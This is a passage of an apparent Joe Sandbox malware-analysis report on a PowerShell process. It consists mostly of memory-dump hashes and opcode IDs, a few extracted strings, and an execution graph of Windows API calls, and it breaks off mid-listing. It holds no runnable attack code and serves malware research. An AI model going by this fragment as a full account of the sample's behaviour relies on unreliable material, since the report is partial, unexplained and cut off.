                                    • Instruction Fuzzy Hash: 728192B12046159FC704EB28C841A9E73E3FFC4304B468A68D549CB766DF74FE4A8BA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 00c4fcbd980f46f88d890a715c0ac4a51c781849a3777ea19608e8be72f6635f
                                    • Instruction ID: 1aed7fe01e3fd16a86770303e67dcd39faae64cce4141feca872327256ac2da6
                                    • Opcode Fuzzy Hash: 00c4fcbd980f46f88d890a715c0ac4a51c781849a3777ea19608e8be72f6635f
                                    • Instruction Fuzzy Hash: E07117BAA00109EFDB15CFA4D984D9A3B7AFF4C750B204269E9069B721CB31EC41DF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e9543b88c4958ad5735cd4c562856d8263b0411accb2985293d5dd6b8451142
                                    • Instruction ID: bcc914e981719ab69df38a4d4c2e7d8495cb45602d1b0e83d1ce560c231d8ada
                                    • Opcode Fuzzy Hash: 2e9543b88c4958ad5735cd4c562856d8263b0411accb2985293d5dd6b8451142
                                    • Instruction Fuzzy Hash: C051A1B1B042149FEB14DF68D990B9E77F2EF89300F1185B9EA05AB391DB71EC418B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b33ec026cfb95986f7d189479de6dc99702352490a513f90941df340105c4f36
                                    • Instruction ID: aa939836a2a9b265ad1af60a2a59adb43231d8c8d381f483fca41012f53f00ac
                                    • Opcode Fuzzy Hash: b33ec026cfb95986f7d189479de6dc99702352490a513f90941df340105c4f36
                                    • Instruction Fuzzy Hash: 7C41EC3250E3E15FD303677AE8603C67F709F4712DF1B10C7E5988A0A3EB68485997AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9bc3d76d4ba0a7560cbba40ecd69a7a93a30bcbf0a1d49f20c90e67006a8b8c9
                                    • Instruction ID: 857e9436fe1e6bcb649e8e6cee3d2ae61fd84819930dc3f4c8bcad78b1db7f79
                                    • Opcode Fuzzy Hash: 9bc3d76d4ba0a7560cbba40ecd69a7a93a30bcbf0a1d49f20c90e67006a8b8c9
                                    • Instruction Fuzzy Hash: 1251C3B1B042299FDB04EF68C541BDD77F2EF88304F128AA8D109EB351DB71AD458BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 120c40a9f3a331ffacc6ef79697268d6d5ae258e6c8c3bfb578a504cc82e4f73
                                    • Instruction ID: c51419a8ea92d33792213b443028e0a4ba9e0b745372a51d3c65da047545e4f8
                                    • Opcode Fuzzy Hash: 120c40a9f3a331ffacc6ef79697268d6d5ae258e6c8c3bfb578a504cc82e4f73
                                    • Instruction Fuzzy Hash: CE51B4712042606BD314E738C8527AE7293EFC4204F868E2CD545CFB56DF75AE4A47A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8d2ed788b5f90d323ba846d5d07a623565ddd5ba130d3e4959342cffbe839510
                                    • Instruction ID: d78cd7174f17a3c4500d9e7002a14fc006863bedc64fb36dc9f3c591a0689883
                                    • Opcode Fuzzy Hash: 8d2ed788b5f90d323ba846d5d07a623565ddd5ba130d3e4959342cffbe839510
                                    • Instruction Fuzzy Hash: 744126B0700210AFD714EB74D856BAE3B63EF85304F4189A8E605AF392DF71AD458BA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c78217e43da8985150c1578224f6ecbd3bbe8ea32fe27914de011f82af3b0716
                                    • Instruction ID: e3a1bfaa769581e2ec6a2fc7ce7bcb5ec41d23b313d11ed3f1574dadcd23205a
                                    • Opcode Fuzzy Hash: c78217e43da8985150c1578224f6ecbd3bbe8ea32fe27914de011f82af3b0716
                                    • Instruction Fuzzy Hash: 795173B12042206BD354E728C8527AE7293EFC4204F864E2CD5468F756DF75AE4A47A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d2530b719a6e0eed4127bb3387851f620a7db92d4d208717e824c438dcddee09
                                    • Instruction ID: 5c795719e6826f5457d0287bdfb269e5c86536e2bcfb4f7faeda80fbd5534517
                                    • Opcode Fuzzy Hash: d2530b719a6e0eed4127bb3387851f620a7db92d4d208717e824c438dcddee09
                                    • Instruction Fuzzy Hash: 9A4105B0700210AFDB14EB64C856BAE3763EF85304F41896CE605AF391DF75BD468BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e09b812f43c244ef0e21973909562c671f69beea5db5a94049302a7110039910
                                    • Instruction ID: bc02ba2e23f92e61ab7fb6cbab183ab1c55ef6bd9e21278451408f6509f041ba
                                    • Opcode Fuzzy Hash: e09b812f43c244ef0e21973909562c671f69beea5db5a94049302a7110039910
                                    • Instruction Fuzzy Hash: B8419FB47001059FDB04DF64C950BAEB7B2EF88308F18C059E909AB795DB74EC46CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1927cd613cf37d4c876530842bcc08e817e485dd64c7e49899e739ab3e51fb6c
                                    • Instruction ID: 8d837a0332a4a13d48b9430963c24ba3e90e968b84238176e1a0c7e93301dd59
                                    • Opcode Fuzzy Hash: 1927cd613cf37d4c876530842bcc08e817e485dd64c7e49899e739ab3e51fb6c
                                    • Instruction Fuzzy Hash: 8A3146B1B092549FEB119FA4DC546EE3FB6DB8A304F0480BBE441DB381CE758C009B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07922019d0418370157f72542b4f30586380bb10089455ed18d662fe6caaacf4
                                    • Instruction ID: a005cf58b3fa42f78fc38502b2e1bf90bf8e7079f2104e0f8eb0abaaa32c56ef
                                    • Opcode Fuzzy Hash: 07922019d0418370157f72542b4f30586380bb10089455ed18d662fe6caaacf4
                                    • Instruction Fuzzy Hash: BB4171B1A10219CFEB04DF64D889ADEBBF2FF88314F1545A4D405BB251CB74AD85CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7e08d0cb6338c506f8ed6e63cbc72f0375a4083c391e9345555bed504ace2f8a
                                    • Instruction ID: fb50455e50cb403de6753af09f3cbd020280a047cb974e588f9c3c49d5a97495
                                    • Opcode Fuzzy Hash: 7e08d0cb6338c506f8ed6e63cbc72f0375a4083c391e9345555bed504ace2f8a
                                    • Instruction Fuzzy Hash: 4031ADB1A10219AFDF14CFA4D854A9EBBB6BF89300F108569F811AB740DB70ED45CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55a470a6aae0906a6e4ef9f5f910788fa90136abac928f2c651b0e5eab88ea95
                                    • Instruction ID: 7d306ac39e796d1d69463dca98f8f367fdfd4e3e929b4ae04afd172a48fb0cc2
                                    • Opcode Fuzzy Hash: 55a470a6aae0906a6e4ef9f5f910788fa90136abac928f2c651b0e5eab88ea95
                                    • Instruction Fuzzy Hash: C1316D70A04255DFC742EBB8C8556AE7BF2EF81304F4249AED108EB392DB345E048B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 04e8b7156af542be0be2d3df5c28252375bc3fded0f3eb810f4fb0eb6ca816a2
                                    • Instruction ID: 30deeebf60a8f60fd148ae6aa4ab18d17d32ccecb06d6d0cdf9be566a7b00179
                                    • Opcode Fuzzy Hash: 04e8b7156af542be0be2d3df5c28252375bc3fded0f3eb810f4fb0eb6ca816a2
                                    • Instruction Fuzzy Hash: 2A2192743403049FF3245B35EC4AB2A7BA2E785765F24853AF9068E3D0CE76A841DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7cb10c72c290210a1f0ccafe8bf93827f50db032d33c26956aacdd26bccb9e5
                                    • Instruction ID: ec38986a1092e80ed8e0a77f70876a106f0e39c6dd8997d342c12e2017166de1
                                    • Opcode Fuzzy Hash: a7cb10c72c290210a1f0ccafe8bf93827f50db032d33c26956aacdd26bccb9e5
                                    • Instruction Fuzzy Hash: E021D4B17082514BF7696AA9A8507BF67C2DBCA358F00817AE50ACB381DF718C4193E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e8a4d7f4a75208d94c9c726188b10e38532a9b069d1da99f7b0a7cdcc7333085
                                    • Instruction ID: b8fda254297860c3ecb4195e3a6c9640b66fe1b548b1a70f7c7de9bae5e7126d
                                    • Opcode Fuzzy Hash: e8a4d7f4a75208d94c9c726188b10e38532a9b069d1da99f7b0a7cdcc7333085
                                    • Instruction Fuzzy Hash: B031AEB4B012168FEF18DF64C658AAD77F2EF48204F1501A9D905EB361DB75ED01CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cac6418616fa904418947a23c5a5a88cca7150ab887518c7a49577b5b332d555
                                    • Instruction ID: 63ec2f52f74d10a7db4707d415e8b6dd201f24e371d31bb6240957e08e067326
                                    • Opcode Fuzzy Hash: cac6418616fa904418947a23c5a5a88cca7150ab887518c7a49577b5b332d555
                                    • Instruction Fuzzy Hash: 2321F5743413409FF3164734EC5AB293BA1EB85714F14806AF906CF3D2CE75A842DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3c6efa39afdd1adfa1a0b924b7b7686586ff2e6ab832b60b2fefa206940c9cb
                                    • Instruction ID: 2b08a17e3bda07ddcc9ebbc83209fbe3efa556f1df034e4cf53008fde1359288
                                    • Opcode Fuzzy Hash: d3c6efa39afdd1adfa1a0b924b7b7686586ff2e6ab832b60b2fefa206940c9cb
                                    • Instruction Fuzzy Hash: 06214BB0A0011ADBDB44EBB4C9556AE77F2EF84309F42497D9119EB381EF346E058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e254ee2d39874a0f3d6f6439270db8cda30a75d4cf824a25aaf88db48a0a432c
                                    • Instruction ID: 59eabbdcc0d9d8460761ab5626914381c053c0ee312252cc56b080b4a1c6157a
                                    • Opcode Fuzzy Hash: e254ee2d39874a0f3d6f6439270db8cda30a75d4cf824a25aaf88db48a0a432c
                                    • Instruction Fuzzy Hash: A32168B5A00119AFDB44DF65D8405EEFBF6FF8D250B148029E554E7740D731D911DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac9c08d885449d3ed38866eee5546b6b627c984ac051b5404ab1f8d32ab727ec
                                    • Instruction ID: 20cfb6e0694c67a31f8da23fa0a412bd65f0a38f69447ca832c16a8c207cb9f5
                                    • Opcode Fuzzy Hash: ac9c08d885449d3ed38866eee5546b6b627c984ac051b5404ab1f8d32ab727ec
                                    • Instruction Fuzzy Hash: 1E2190B1A00345CFDB11CF58D548BEEBBF2FB84304F18819AD854A7351D3B49995DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dcbc5b975ba814e00649e07418e7b3a4f213866f29f55f0ce64c83e41deb16d2
                                    • Instruction ID: d1a9180dad47d23fd38f4a538d1cfbd7ad67d062c6eeffa11c3d6b99b223c711
                                    • Opcode Fuzzy Hash: dcbc5b975ba814e00649e07418e7b3a4f213866f29f55f0ce64c83e41deb16d2
                                    • Instruction Fuzzy Hash: 9A1181B1601309CBEB249B61CA986AE7BF2EF88A41F1010A8D402A7261DF759D40DFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aeb561650f628f02ef45a80bc7cb1f8861866608af8df9775a5f0a666b2e0d6d
                                    • Instruction ID: d153633b8e6f34c23bb8a7fffb6949aadb222eed32497300faf1e7d0915dc718
                                    • Opcode Fuzzy Hash: aeb561650f628f02ef45a80bc7cb1f8861866608af8df9775a5f0a666b2e0d6d
                                    • Instruction Fuzzy Hash: A50141F23086149FF3215A28AC016EBBB95DBC7368F0480BBF506CB340EA318E0183B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86718170484.00000000006BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 228dcae8277206e37e53e17ef64a238b48d21e23e8d3db2c9cdd19e2df2de4aa
                                    • Instruction ID: d2fafad19d866aade1e8a7ffacd6c872884deae852a8d51bac17db95f8eb5019
                                    • Opcode Fuzzy Hash: 228dcae8277206e37e53e17ef64a238b48d21e23e8d3db2c9cdd19e2df2de4aa
                                    • Instruction Fuzzy Hash: F101F7B1009340AAD7205E15C884BE7BF98DF45328F18C11AEE494F282D3799C81CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86718170484.00000000006BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 04ebf208c35f17c9194decbf596fecc23dae65bb25043a058130e654dc246f06
                                    • Instruction ID: 28ec6ec39b7fad11ba5c6e0b9b54913d26e6166f2fe53ec9ce759ba7d415aee0
                                    • Opcode Fuzzy Hash: 04ebf208c35f17c9194decbf596fecc23dae65bb25043a058130e654dc246f06
                                    • Instruction Fuzzy Hash: F501007140E3C09ED7129B258D94A92BFB4DF53228F1981DBD9888F2A3D2695848C772
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f10fe2258213d6b53d481ce25bf89fb0c4fe80940af4a3e51968c1cfaf00d901
                                    • Instruction ID: 6af1957965f044929d597e06d6a42278eb0a0df2e48a4231f53a2e79d688504a
                                    • Opcode Fuzzy Hash: f10fe2258213d6b53d481ce25bf89fb0c4fe80940af4a3e51968c1cfaf00d901
                                    • Instruction Fuzzy Hash: 36D05E7A30052027050436ABA80085FFA9BEBC9661340416AEA0AC7740DE61AD5647E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e2814b581192cfeb8b462ed6f0bde1436dcf7fe0af5fa4a89ef270a3b0759a83
                                    • Instruction ID: 4ca434dfe1901da6d5e74ec85234b1f0e718912367be05517232e9af42dcb71a
                                    • Opcode Fuzzy Hash: e2814b581192cfeb8b462ed6f0bde1436dcf7fe0af5fa4a89ef270a3b0759a83
                                    • Instruction Fuzzy Hash: 28D06736104249BF8B01CE94DD51CAA7F6AEB49214B14C049BE5946262C633E972EBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
                                    • Instruction ID: 2f1addc7ac752b055209e5a892d08ee60b8d95dd5987d24a20b0db1062a2c8ce
                                    • Opcode Fuzzy Hash: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
                                    • Instruction Fuzzy Hash: CFD06736104249AF8B01CE84D951C6A7F6AEB49214B14C049BE5946262C633E932EBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2e6ed3af7532fd57c2c7f230f54ccc9c871a9174d945ba7369fceb43da95e71
                                    • Instruction ID: bbeee2ffc056cd8d43f50237998b029375a701bbb8b5e9f832e960ee7abd0a81
                                    • Opcode Fuzzy Hash: a2e6ed3af7532fd57c2c7f230f54ccc9c871a9174d945ba7369fceb43da95e71
                                    • Instruction Fuzzy Hash: 68D0A76514D3C58FC302C724951181A7FA15EE6101B19809AD085C6BA3C024480DC722
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11e23107db3005001dda8026305acd6ba4a497a14e6fb20d13d784293445747a
                                    • Instruction ID: 9ec3bee0d742219f69d34c91bf6d76a824eddc4456921cdef26eba7c86e39322
                                    • Opcode Fuzzy Hash: 11e23107db3005001dda8026305acd6ba4a497a14e6fb20d13d784293445747a
                                    • Instruction Fuzzy Hash: BBC08CB58C9B00BAEE55CBA0DE0BF41BFB6B750B01F068165F20A4F8C2D67051A5DB76
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86723151942.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_8e0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,kjk$0oaj
                                    • API String ID: 0-349706782
                                    • Opcode ID: b64a563853385e546bda6fccfc1aa5303c115a9bde48a1baa7867c98220f5d5c
                                    • Instruction ID: 7f068d3cea9c9156414eda751fd40e718351e71c8e613d70d66bc48cbd0974e7
                                    • Opcode Fuzzy Hash: b64a563853385e546bda6fccfc1aa5303c115a9bde48a1baa7867c98220f5d5c
                                    • Instruction Fuzzy Hash: 77A2FF307081105BEB589BB5DC11BEF3667DBC8708F28C069E9099F784DFB29D829B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86723151942.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_8e0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,kjk$0oaj
                                    • API String ID: 0-349706782
                                    • Opcode ID: 74236006ed04490806888358dfe1925037f4fe68eed9c801f78113dd452c3258
                                    • Instruction ID: 683870244b733da1489939146d0dfcd2400d90ddbb7415e493ae7152ecfbac8a
                                    • Opcode Fuzzy Hash: 74236006ed04490806888358dfe1925037f4fe68eed9c801f78113dd452c3258
                                    • Instruction Fuzzy Hash: FDA2FF307081105BEB589BB5DC11BEF3667DBC8708F28C029E9099F784DFB29D829B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk$`Jk$`Jk$`Jk$`Jk
                                    • API String ID: 0-2734599850
                                    • Opcode ID: e1de6e8d7cc72d9b1b79da3521be0d8aeabe06f3d331f0191ea1c87928f73558
                                    • Instruction ID: fe927d190f1124b84f58ef372154866e293b77a94887b189d288e0ea266ca356
                                    • Opcode Fuzzy Hash: e1de6e8d7cc72d9b1b79da3521be0d8aeabe06f3d331f0191ea1c87928f73558
                                    • Instruction Fuzzy Hash: 9502C1B0B042159FEB24DF64D984AAEB7F2EF89304F1585A8D906DB341DB34EC41CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:25.8%
                                    Dynamic/Decrypted Code Coverage:98.6%
                                    Signature Coverage:6.8%
                                    Total number of Nodes:148
                                    Total number of Limit Nodes:8
                                    execution_graph 39235 10e378e 39236 10e37c3 CertVerifyCertificateChainPolicy 39235->39236 39238 10e37f2 39236->39238 39239 10e1d0a 39240 10e1d3f RasConnectionNotificationW 39239->39240 39242 10e1d72 39240->39242 39243 10e4c0a 39244 10e4c48 DuplicateHandle 39243->39244 39245 10e4c80 39243->39245 39246 10e4c56 39244->39246 39245->39244 39247 10e0c8a 39248 10e0cd5 RasEnumConnectionsW 39247->39248 39250 10e0ce8 39248->39250 39251 10e2806 39252 10e2841 getaddrinfo 39251->39252 39254 10e28b3 39252->39254 39259 10e1302 39260 10e133a OpenFileMappingW 39259->39260 39262 10e1375 39260->39262 39263 10e1402 39264 10e143a MapViewOfFile 39263->39264 39266 10e1489 39264->39266 39270 10e4996 39271 10e49cb getsockname 39270->39271 39273 10e49ff 39271->39273 39274 10e17ae 39275 10e17e3 shutdown 39274->39275 39277 10e180c 39275->39277 39278 1d63b5c2 39279 1d63b612 MkParseDisplayName 39278->39279 39280 1d63b620 39279->39280 39281 10e082a 39282 10e0862 CreateFileW 39281->39282 39284 10e08b1 39282->39284 39285 1d63a346 39286 1d63a372 FindCloseChangeNotification 39285->39286 39287 1d63a3b1 39285->39287 39288 1d63a380 39286->39288 39287->39286 39289 10e2426 39290 10e2476 GetTempFileNameW 39289->39290 39291 10e247e 39290->39291 39292 10e1c26 39293 10e1c5b WSAEventSelect 39292->39293 39295 10e1c92 39293->39295 39296 10e16a6 39297 10e16de CreateMutexW 39296->39297 39299 10e1721 39297->39299 39304 111b33a TerminateThread 39305 1109473 39304->39305 39306 10e45a2 39307 10e45f2 RegEnumKeyExW 39306->39307 39308 10e4600 39307->39308 39313 